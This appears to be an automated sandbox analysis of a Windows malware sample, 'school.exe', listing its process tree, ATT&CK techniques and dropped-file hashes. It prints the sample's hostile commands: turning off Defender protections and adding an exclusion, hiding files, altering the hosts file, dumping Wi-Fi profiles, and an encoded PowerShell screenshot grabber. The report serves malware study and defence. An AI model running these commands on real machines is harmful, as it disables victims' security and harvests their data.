pid Process 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1132 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4780 wrote to memory of 2076 4780 school.exe 81 PID 4780 wrote to memory of 2076 4780 school.exe 81 PID 4780 wrote to memory of 2468 4780 school.exe 82 PID 4780 wrote to memory of 2468 4780 school.exe 82 PID 4780 wrote to memory of 472 4780 school.exe 84 PID 4780 wrote to memory of 472 4780 school.exe 84 PID 4780 wrote to memory of 1736 4780 school.exe 86 PID 4780 wrote to memory of 1736 4780 school.exe 86 PID 4780 wrote to memory of 1916 4780 school.exe 87 PID 4780 wrote to memory of 1916 4780 school.exe 87 PID 4780 wrote to memory of 3404 4780 school.exe 88 PID 4780 wrote to memory of 3404 4780 school.exe 88 PID 4780 wrote to memory of 5056 4780 school.exe 89 PID 4780 wrote to memory of 5056 4780 school.exe 89 PID 4780 wrote to memory of 1136 4780 school.exe 90 PID 4780 wrote to memory of 1136 4780 school.exe 90 PID 4780 wrote to memory of 2824 4780 school.exe 91 PID 4780 wrote to memory of 2824 4780 school.exe 91 PID 4780 wrote to memory of 2852 4780 school.exe 92 PID 4780 wrote to memory of 2852 4780 school.exe 92 PID 4780 wrote to memory of 440 4780 school.exe 93 PID 4780 wrote to memory of 440 4780 school.exe 93 PID 4780 wrote to memory of 2552 4780 school.exe 94 PID 4780 wrote to memory of 2552 4780 school.exe 94 PID 4780 wrote to memory of 1712 4780 school.exe 95 PID 4780 wrote to memory of 1712 4780 school.exe 95 PID 4780 wrote to memory of 4932 4780 school.exe 96 PID 4780 wrote to memory of 4932 4780 school.exe 96 PID 4932 wrote to memory of 5044 4932 powershell.exe 97 PID 4932 wrote to memory of 5044 4932 powershell.exe 97 PID 5044 wrote to memory of 3960 5044 csc.exe 98 PID 5044 wrote to memory of 3960 5044 csc.exe 98 PID 5040 wrote to memory of 1596 5040 chrome.exe 106 PID 5040 wrote to memory of 1596 5040 chrome.exe 106 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 PID 5040 wrote to memory of 1400 5040 chrome.exe 107 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 2552 attrib.exe 2076 attrib.exe 2468 attrib.exe 440 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\school.exe"C:\Users\Admin\AppData\Local\Temp\school.exe"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\school.exe2⤵
- Views/modifies file attributes
PID:2076
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe2⤵
- Views/modifies file attributes
PID:2468
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\school.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1916
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵PID:3404
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name2⤵PID:5056
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2824
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵PID:2852
-
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:440
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2552
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2tv2bul\z2tv2bul.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA950.tmp" "c:\Users\Admin\AppData\Local\Temp\z2tv2bul\CSC5773B967F1984AAFB66FA26AAEF5ECA.TMP"4⤵PID:3960
-
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1132
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8829dab58,0x7ff8829dab68,0x7ff8829dab782⤵PID:1596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1496 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:22⤵PID:1400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:82⤵PID:1180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:82⤵PID:1640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:12⤵PID:2492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:12⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3484 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:12⤵PID:4596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4616 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:82⤵PID:1368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:82⤵PID:4160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:82⤵PID:676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4764 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:12⤵PID:4692
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:2704
-
C:\Users\Admin\AppData\Local\Temp\school.exe"C:\Users\Admin\AppData\Local\Temp\school.exe"1⤵
- Executes dropped EXE
PID:792
-
C:\Users\Admin\AppData\Local\Temp\school.exe"C:\Users\Admin\AppData\Local\Temp\school.exe"1⤵
- Executes dropped EXE
PID:1432
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
384B
MD54098fb1479d339dfb707672a7e73957a
SHA1805e687a049101cf14468f58b914d5a937fc5d3e
SHA2564486fbea808ff0e995637072ffe14e2fee88ec72c9cc98b9140f3407ce74a37c
SHA5128bd64e18e371ac5603cd41fc93eff36d8cb64ca8ccd4fd1ff192697fcf4de68b9b26d62818f5c2beeed2bea3fd9dc1a87212b9aaff4d264f967aeea21f6564c2
-
Filesize
3KB
MD5b5c5dfda49de6c3ca09c16c3660a149c
SHA17d2c65e232095b01b1f3f4c1a67e6b86c6b75d42
SHA25635bf2fc15063719b734c166de08d9c89d4e86ce9a704e12dc1b8d8986831c0d2
SHA512984e65bbe003b46b17eb3134417e5d038382067d7c40953b5e1b24e8c97c375bd21590ecdc1ae7d1e16b40386a03ccdc19329c4cf91303eb3a614fbd5019c16d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
857B
MD51cbae2272cf5ce6df6c75260d161a3c8
SHA13fa862eccc982bea764f2b464d1c50fd113b75e2
SHA256f3e4c4cc37825eb5159ae9a3b8da989c4fe9788afe68d0a96c04c1bb80004f42
SHA51241c6b6154819874f91857412d0ac80563f6b4d5563ba7c1fefb6e99cba9863665f7bc3c0f72cb85b144a6cda0d1f946b82f90798c3fa813dbaa47c97e9fea724
-
Filesize
356B
MD5d4ee2a1e9a50a5b69cd4dea4f571ab1b
SHA1d18796be66f2f215e0562841f03694367f73ea03
SHA2562147c06ab70073664f2529bd8227fd6ff50393d9c3df5b5d55d8b5eb6415dad6
SHA5127b54ecec03499366ea860b08626c57a261821742ba8dfb14cdf9ac7d5a6ee1a2c0b07d745073dc5586197f0c9ce1dc02e67cdbfc0c3a67f564bec9028fd67808
-
Filesize
7KB
MD5147a0f648c265d2dec3dfd8bda33b448
SHA1e447993f08b132cebbf0582a3dae9aa21b7e6377
SHA25671701f3c31ad663000b556c999ed397e8d0cbecfe986ba3b46e2f3fe185d762e
SHA512b6ac622da6198a2c4d884a9d5d2e6913b1362f4b167c9c0a6f9065b72f029cb921bdab0e39f43f55edd8b179f1eafa248f1817dcbfb3c07d0fac69d5b8a2cf6b
-
Filesize
7KB
MD5197acc725050846ec804b7177a8ba6f1
SHA153a16e186a04fc5eed15e1c744c1c1100644105c
SHA256942c05cd8251bce314b24bbd0425d36c5c82df31957661161796be7c198c9ddc
SHA512a485f25f6e37a1f5c4c08952aff96e7dc6d71f1fe6c07e1f176c588e5ed96d8afe40cae58c9ad1715506a40ec26588f41c1b35a669a543924f5ccb2f75d9b0fc
-
Filesize
6KB
MD5940859a61eff8237e90610bfc4e0b02c
SHA112324aaff2eef4b2eaa2d902f0cd8956bc3ce241
SHA2562be40c875ed8f8139408591393eea19adb03fbbd7d23bf3506ab3dfb49caf31c
SHA5121c7fb5e72626c0fbd24aab7cd13843a2aa152234cbd414d495685839c588cf1da28f2778803e0e21fbf4680c5f58a5a3cb052f9c0b38f7d629dd207d2668203a
-
Filesize
16KB
MD5e333311f9565b4d45be5e26fc0547c35
SHA1d27088dd4fddd6822f2dbc47c3efa61dba4fa997
SHA256a2d6684e1e8792bdec07addd6f96273e146f730ceb2fdcee03ad70b8e302824a
SHA51219d22c3f964981951649838dd2825ec7da911ac643428c1da2d9323a759a6edd40320161ca9f2c99aa297a794c3fe6ffa1eaa6593d6ce2d2bb1c79bb4f38960f
-
Filesize
285KB
MD5968a0eedc1f85003eb5169ecf43feeec
SHA1eb0a3d1d647d2e2fe3efba89405552ad8de105b8
SHA256fa551dd28f77f51650fa6acadc1d28edb21e0a1b7f960c994660c1ffbe5ccf87
SHA512d90a9fc6dbd46336cc8eb8c261adfd903f374501690979051cced1f5774108063df016d9e7cde5575be38d224c4f348c86a284eeaec1e303fe08c76f226df061
-
Filesize
285KB
MD510f6d8683f1c793757d165c4b81c9ad9
SHA1d318905df0febdbaf98811c56e15c64fe5e45f86
SHA2562e403660d9df711a3da9b647f78baaba18d18c3e4b144bfab6a85f6d721bf4ac
SHA512de5250d06c3a0a66904f4b371028ce2a0371e4a1c1e59ac008f1ef08c90f1943abf3c7cb70fdd3d333daef949c3d012a1c3dc5a9677cea5f4f6b079b8a5ef5cf
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD5e3840d9bcedfe7017e49ee5d05bd1c46
SHA1272620fb2605bd196df471d62db4b2d280a363c6
SHA2563ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f
SHA51276adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376
-
Filesize
944B
MD5781da0576417bf414dc558e5a315e2be
SHA1215451c1e370be595f1c389f587efeaa93108b4c
SHA25641a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe
SHA51224e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize10KB
MD500d55e92419b7a500fac6fbff94aeab6
SHA185c20b3b1230158f73d1da99f8cb539bd0f1b1bd
SHA2564fb34ca1daed6bd2f358a2529dfe2d60c546c4c1bda5e9a7c61a65418f76d321
SHA512cefb98597ece4f6f8802dca0c16fcc8812e523dcb7853ff15888ea125b87e3ae1436de10cd9c23e9bd3a5ce236273b6d9b07824bcb51432ae94708587810c521
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize10KB
MD55660dec6d17c4d73cf0ccd78f7b8297b
SHA1cb8a2e6d8f5e7e931867d284f97dc0dcf039baff
SHA256771d63aaabf3443c385554c7ae6d1e64d35d5e82d6dffc42ee4808ae66716c8f
SHA5122fc21e58402d35901911b13122e7a6903afb42613ee2477b72fc93e9e49dac148ef2859d62e8f799c79ca29a457ce6a94ba30bc7b94aa805ba1c7f2331182d70
-
Filesize
1KB
MD59a124a7328d081d796e1e936de0c1a6a
SHA171d3d31d40e24dbf7e793018cae001a0efb089a5
SHA2567375566d8b2eaedcc451c801f04d0a52bd3fe040b899892c366eb9e5831a0224
SHA51229b6022c2608a356db8fe2452564579332da3b38787d82135ca42730c54fd591542e61ba02cbfe7fe55982a2119699b09114123914790f83485d6bca0b7519c9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
413KB
MD522533ec30a719402342165ed80784e17
SHA1d026628e53eda489fa0e9549bde228975c256118
SHA25626dcc400d1fa6caa3ff6e01f5a73ca8609ced64452ca6efb589a50e3229eedf4
SHA5128276b9c3f704b6013d598233c739b928fcb61bd8ffc69d40f3117e90c8b8d315ec2ad3d3041571bdabcc5d0db5f32170a9350183be7a22b1a0b441689fa415d8
-
Filesize
4KB
MD53fed61cf2df001b601d924d3dd5b3267
SHA14a06012636e95fcd3ab5ae0cacf0372a9f78031d
SHA256d8e792f148913806eb3a0b64050580442db88c3a97e267405a960b56bce890c2
SHA512e4f73d20e590ed8c599b2b96ae0281a31eae0fe7dd9cb389b93abe25ff6a1b66bc2a9d46373117c699e8fa6707737b5e51d10975f7cab586e7db27c9e06d84f8
-
Filesize
9.3MB
MD5df99beb55f643551ae73184125d723ec
SHA19ea0ac60ec61a64dcb9eb21509b76ee8799434d5
SHA256e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15
